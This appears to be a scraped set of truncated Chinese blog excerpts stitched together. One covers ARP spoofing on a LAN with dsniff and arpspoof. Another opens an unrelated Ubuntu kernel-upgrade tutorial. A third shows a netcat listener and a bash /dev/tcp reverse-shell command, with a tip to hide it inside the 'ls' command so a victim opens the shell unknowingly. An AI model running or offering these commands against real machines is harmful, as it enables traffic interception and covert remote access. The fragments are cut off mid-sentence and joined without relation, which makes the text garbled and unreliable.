先安装 dsniff ：apt-get install dsnifffping -asg 192.168.0.100/24查看局域网中存活的主机先ping一下目标主机，看是否ping得通要攻击需要知到目标ip,网关（网关是啥？）,本机网卡（eth0）。arpspoof -i eth0 -t 目标IP 网关ps:如果出现arpspoof: couldn’t arp for host ，要把虚拟机设置

解决办法如图所示：

前言原本使用Ubuntu 18.04.2 LTS来换到5.4.45的内核版本，来尝试在系统中直接用sudo apt-get install linux-image-…命令更新一下Linux的内核，但是碰到各种驱动不兼容的问题。网传的ubuntu更新内核的教程都有各种问题，例如我们这次会提到的，更新到4.17版本之后的内核，需要安装的软件包会多一个。这次自己来写一个教程记录一下。1 为什么要更新Li

在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中，方便测试。比如在测试到命令注入时，可以反弹shell进行进一步测试。一、nc和bash在我们的主机上执行nc -lvp port表示显示执行过程监听端口在目标主机上执行bash -i >& /dev/tcp/ip/port 0>$1（扩展：可以把此命令嵌入到常用的 ls 命令，神不知鬼不觉的让对方给你建立一个反弹

https://www.cnblogs.com/wjrblogs/p/13683812.html